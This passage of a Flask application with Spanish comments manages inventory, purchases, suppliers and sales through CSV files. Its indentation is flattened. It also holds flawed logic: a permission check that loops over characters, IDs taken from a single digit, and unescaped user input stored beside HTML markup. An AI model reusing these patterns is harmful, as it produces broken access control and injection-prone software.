with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "1":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('inventario.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
# Load the list of products.
@app.route('/cargarInventario', methods=['POST'])
def cargarInventario():
datos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as File:
readercp = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
datos = list(readercp)
    del datos[0] # Remove the first line of data so the titles are not returned.
return json.dumps({'datos':datos})
# Delete a selected product.
@app.route('/borrarInventario', methods=['POST'])
def borrarInventario():
idInventario = request.form['idInventario']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idInventario: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
# Create a product.
@app.route('/crearProducto', methods=['POST'])
def crearProducto():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, dialect='unix', delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
nombre = request.form['nombreP']
tipo = request.form['tipoP']
cantidad = request.form['contidadP']
precioCompra = str(request.form['precioCompraP']) + "$"
precioVenta = str(request.form['precioVentaP']) + "$"
controles = '<button onclick="modificar({})" class="btn btn btn-outline-warning" type="button">Modificar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'NOMBRE': nombre, "TIPO": tipo, "CANTIDAD": cantidad, "PRECIO_COMPRA": precioCompra, "PRECIO_VENTA": precioVenta, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
return json.dumps(1);
# Load the data of a selected product.
@app.route('/verProducto', methods=['POST'])
def verProducto():
idInventario = request.form['idInventario']
datosP = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowvp["ID"] == idInventario: #Añadimos los datos del elemento seleccionado(id) a la lista
datosP.append(rowvp['ID'])
datosP.append(rowvp['NOMBRE'])
datosP.append(rowvp['TIPO'])
datosP.append(rowvp['CANTIDAD'])
datosP.append(rowvp['PRECIO_COMPRA'][:-1])
datosP.append(rowvp['PRECIO_VENTA'][:-1])
return json.dumps({'datos':datosP}) #Devolvemos los datos en forma json
# Update the data of a selected product.
@app.route('/actualizarProducto', methods=['POST'])
def actualizarProducto():
precioCompra = request.form['precioCompraAP']
precioVenta = request.form['precioVentaAP']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowacp["ID"] == request.form['idAP']: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['NOMBRE'] = request.form['nombreAP']
rowacp['TIPO'] = request.form['tipoAP']
rowacp['CANTIDAD'] = request.form['contidadAP']
rowacp['PRECIO_COMPRA'] = str(precioCompra) + "$"
rowacp['PRECIO_VENTA'] = str(precioVenta) + "$"
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'TIPO': rowacp['TIPO'], 'CANTIDAD': rowacp['CANTIDAD'], 'PRECIO_COMPRA': rowacp['PRECIO_COMPRA'], 'PRECIO_VENTA': rowacp['PRECIO_VENTA'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
return json.dumps(1);
@app.route('/compras.html')
def compras():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "2":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('compras.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
# Load the list of purchases.
@app.route('/cargarCompras', methods=['POST'])
def cargarCompras():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
index += 1
if index == 7:
index = 0
if index == 2:
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarI]
datos.append(rowlp[1])
if index == 3:
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarP]
datos.append(rowlp[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/selectInventario', methods=['POST'])
def selectInventario():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
datos.append(rowlc[0])
datos.append(rowlc[1])
datos.append(rowlc[4])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/selectProveedor', methods=['POST'])
def selectProveedor():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
datos.append(rowlc[0])
datos.append(rowlc[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/crearCompra', methods=['POST'])
def crearCompra():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
producto = request.form['sProductos']
proveedor = request.form['sProveedor']
cantidad = str(request.form['cantidadCP'])
precio = str(request.form['precioCP']) + "$"
total = str(request.form['totalCP']) + "$"
controles = '<button onclick="comprar({})" class="btn btn btn-outline-warning" type="button">Comprar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'PRODUCTO': producto, "PROVEEDOR": proveedor, "CANTIDAD": cantidad, "PRECIO": precio, "TOTAL": total, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaCompras.csv')
return json.dumps(1);
@app.route('/borrarCompra', methods=['POST'])
def borrarCompra():
idCompra = request.form['idCompra']
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idCompra: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaCompras.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/comprarCompra', methods=['POST'])
def comprarCompra():
ridCompra = request.form['idCompra']
rproducto = ""
rproveedor = ""
rcantidad = ""
rprecio = ""
rtotal = ""
rproductoNombre = ""
now = datetime.datetime.now()
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == ridCompra:
rproducto = rowvp['PRODUCTO']
rproveedor = rowvp['PROVEEDOR']
rcantidad = rowvp['CANTIDAD']
rprecio = rowvp['PRECIO']
rtotal = rowvp['TOTAL']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == rproducto:
rproductoNombre = rowvp['NOMBRE']
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "DATE", "NOMBREP"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
producto = rproducto
proveedor = rproveedor
cantidad = rcantidad
precio = rprecio
total = rtotal
date = (str(now.day) + "/" + str(now.month) + "/" + str(now.year))
nombrep = rproductoNombre.capitalize()
data = {'ID': ID, 'PRODUCTO': producto, "PROVEEDOR": proveedor, "CANTIDAD": cantidad, "PRECIO": precio, "TOTAL": total, "DATE": date, "NOMBREP": nombrep}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv')
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, delimiter=";"):
if rowacp["ID"] == rproducto: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['CANTIDAD'] = int(rowacp['CANTIDAD']) + int(rcantidad)
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'TIPO': rowacp['TIPO'], 'CANTIDAD': rowacp['CANTIDAD'], 'PRECIO_COMPRA': rowacp['PRECIO_COMPRA'], 'PRECIO_VENTA': rowacp['PRECIO_VENTA'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
with open(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "PROVEEDOR", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, delimiter=";"):
if rowbp["ID"] != ridCompra: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaCompras.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaCompras.csv')
return json.dumps(1);
@app.route('/historicoCompras.html')
def historicoCompras():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "1":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('historicoCompras.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarHistorialCompras', methods=['POST'])
def cargarHistorialCompras():
idProducto = 1
listaDatos = []
cantidad = 0
index = 0
with open(os.getcwd()+'/Python3_SGE/datos/listaHistoricoCompras.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
if len(listaDatos) == 0:
datos.append(rowlc[1])
datos.append(rowlc[3])
datos.append(rowlc[4])
datos.append(rowlc[5])
datos.append(rowlc[6][3:-5])
datos.append(rowlc[7])
listaDatos.append(datos)
else:
if listaDatos[index][0] == rowlc[1] and listaDatos[index][4] == rowlc[6][3:-5]:
listaDatos[index][1] = str(int(listaDatos[index][1]) + int(rowlc[3]))
else:
datos.append(rowlc[1])
datos.append(rowlc[3])
datos.append(rowlc[4])
datos.append(rowlc[5])
datos.append(rowlc[6][3:-5])
datos.append(rowlc[7])
listaDatos.append(datos)
index += 1
return json.dumps({'datos':listaDatos})
@app.route('/proveedor.html')
def proveedor():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "2":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('proveedor.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarProveedores', methods=['POST'])
def cargarProveedores():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/newProveedor', methods=['POST'])
def crearProveedor():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, dialect='unix', delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
nombre = request.form['nombreProveedor']
direccion = request.form['calleProveedor']
telefono = request.form['telefonoProveedor']
controles = '<button onclick="modificar({})" class="btn btn btn-outline-warning" type="button">Modificar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'NOMBRE': nombre, "DIRECCION": direccion, "TELEFONO": telefono, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
return json.dumps(1);
@app.route('/borrarProveedor', methods=['POST'])
def borrarProveedor():
idProveedor = request.form['idProveedor']
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idProveedor: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/verProveedor', methods=['POST'])
def verProveedor():
idProveedor = request.form['idProveedor']
datosP = []
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowvp["ID"] == idProveedor: #Añadimos los datos del elemento seleccionado(id) a la lista
datosP.append(rowvp['ID'])
datosP.append(rowvp['NOMBRE'])
datosP.append(rowvp['DIRECCION'])
datosP.append(rowvp['TELEFONO'])
return json.dumps({'datos':datosP}) #Devolvemos los datos en forma json
@app.route('/actualizarProveedor', methods=['POST'])
def actualizarProveedor():
with open(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowacp["ID"] == request.form['idProveedor']: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['NOMBRE'] = request.form['nProveedor']
rowacp['DIRECCION'] = request.form['cProveedor']
rowacp['TELEFONO'] = request.form['tProveedor']
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'DIRECCION': rowacp['DIRECCION'], 'TELEFONO': rowacp['TELEFONO'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaProveedors.csv')
return json.dumps(1);
@app.route('/ventas.html')
def ventas():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "3":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('ventas.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarVentas', methods=['POST'])
def cargarVentas():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
index += 1
if index == 7:
index = 0
if index == 2:
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarI]
datos.append(rowlp[1])
if index == 3:
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as lp:
readerlp = csv.reader(lp, delimiter=';', quotechar=';', quoting=csv.QUOTE_MINIMAL)
next(readerlp)
for rowlp in readerlp:
if i == rowlp[0]:
del datos[borrarP]
datos.append(rowlp[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/selectCliente', methods=['POST'])
def selectCliente():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
for rowlc in readerlc:
datos = []
datos.append(rowlc[0])
datos.append(rowlc[1])
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/crearVenta', methods=['POST'])
def crearVenta():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "CLIENTE", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
producto = request.form['sProductos']
cliente = request.form['sCliente']
cantidad = str(request.form['cantidadCP'])
precio = str(request.form['precioCP']) + "$"
total = str(request.form['totalCP']) + "$"
controles = '<button onclick="vender({})" class="btn btn btn-outline-warning" type="button">Vender</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'PRODUCTO': producto, "CLIENTE": cliente, "CANTIDAD": cantidad, "PRECIO": precio, "TOTAL": total, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaVentas.csv')
return json.dumps(1);
@app.route('/borrarVenta', methods=['POST'])
def borrarVenta():
idCompra = request.form['idCompra']
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "CLIENTE", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idCompra: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaVentas.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/realizarVenta', methods=['POST'])
def realizarVenta():
ridVenta = request.form['idVenta']
rproducto = ""
rcliente = ""
rcantidad = ""
rprecio = ""
rtotal = ""
rproductoNombre = ""
now = datetime.datetime.now()
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == ridVenta:
rproducto = rowvp['PRODUCTO']
rcliente = rowvp['CLIENTE']
rcantidad = rowvp['CANTIDAD']
rprecio = rowvp['PRECIO']
rtotal = rowvp['TOTAL']
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, delimiter=";"):
if rowvp["ID"] == rproducto:
rproductoNombre = rowvp['NOMBRE']
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
